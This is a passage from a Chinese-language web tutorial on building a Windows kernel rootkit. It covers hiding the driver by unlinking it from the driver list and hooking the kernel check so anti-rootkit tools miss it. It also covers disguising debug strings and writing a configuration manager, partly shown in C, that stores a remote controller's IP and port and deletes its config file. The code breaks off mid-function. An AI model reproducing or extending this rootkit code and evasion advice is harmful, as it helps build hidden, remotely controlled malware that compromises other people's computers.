Rootkit隐形技术教程.docVIP

Rootkit隐形技术教程 ? 作者：佚名?? 来源：转载?? 版权：原作者?? 发布时间：2008-8-24 11:50:34? 共阅读 257 次? 【字体：小大】 ? ? javascript:if(this.width500)this.width=500 border=0 图1 ?修改前的驱动程序链表 javascript:if(this.width500)this.width=500 border=0 图2 ?修改后的驱动程序链表 细心的读者也许会问：能藏起来固然是好，不过系统若仅通过该链表来感知驱动程序的存在的话，我们的这样做岂不是自己把rootkit给干掉了？！的幸运的是，Windows操作系统的内核使用另一个表来给各运行中的驱动程序分配时间，所以，即使从设备驱动程序列表清除rootkit相应的表项，我们的rootkit也照样活得很自在。 利用该技术隐匿rootkit时，必须注意一点：如果已在我们的rootkit之前安装了anti-rootkit软件，“清除一个设备驱动程序表项”这一行为本身有可能被发觉，从而引起人们的注意。读者会问：这该怎么办呢？答案是，先记下本rootkit所对应的设备驱动程序表项的地址，然后钩住钩住检查设备驱动程序链表的内核函数，当这个函数要检查该链表时，我们就有机会提前把保存的表项放回到设备驱动程序链表。当检查过后，再将该表项摘除。这样，在rootkit检测程序看来，没有人在设备驱动程序链表做手脚：反Rootkit软件被我们忽悠了。不过该技术较为复杂，超出了本文的讨论范围，有机会我们会专文讲解。 您可能已经注意到，在Invisible.c中很多地方都使用了调试语句。事实上，DbgPrint语句基本上可以在rootkit中随意放置。在本例中，我们使用DbgPrint语句用来监视驱动程序的装卸和错误状态。不过该语句的输出不会直接显示到标准输出设备即显示器上，只有在DebugView程序的帮助下，我们才可以查看这些语句的输出。除DebugView程序外，内核程序调试工具也可以达此目的。另外，我们的调试语句还有一个特点，它们都以comint 32开头，这样做一方面是用以区别其他程序的调试语句的输出。 另一方面利用comint 32这个词是为了掩人耳目，因为这个词很难让人跟rootkit联系到一块。 三、配置管理器 我们的rootkit主体已经建好，不过要想让它干活，还得做些必要的配置。比如，如果需要对其进行远程控制的话，就需要配置相应的连接。所以，我们还需要一个配置管理器，来完成配置rootkit的工作。下面是Rootkit配置管理器的头文件： // configManager.h // 配置管理器的头文件 #ifndef _CONFIG_MANAGER_H_ #define _CONFIG_MANAGER_H_ Char ?masterPort[10]; Char ?masterAddress1[4]; Char ?masterAddress2[4]; Char ?masterAddress3[4]; Char ?masterAddress4[4]; NTSTATUS Configure(); #endif ? 我们的头文件configManager.h比较简单，前面部分定义的数据结构用于控制端的通信地址和通信端口。最后声明了一个函数。接下来，我们看一下配置管理器的源代码： // configManager.c // 首先从c:\config16寻找配置文件 // If its there, save as MASTER_FILE:config16 and delete c:\config16 // If its not there, try MASTER_FILE:configFile // If that doesnt exist, quit! #include ntddk.h #include fileManager.h #include configManager.h // Set the controllers IP and port NTSTATUS Configure() { ?CHAR data[21]; ?SHORT vis = 0; ?SHORT loop; ?SHORT dataIndex; ?SHORT addressIndex; ?ULONG fileSize; ?PHANDLE fileHandle; ?//了解读哪个文件 ?if( NT_SUCCESS( GetFile( L\\??\\C:\\config16, data, 21, fileSi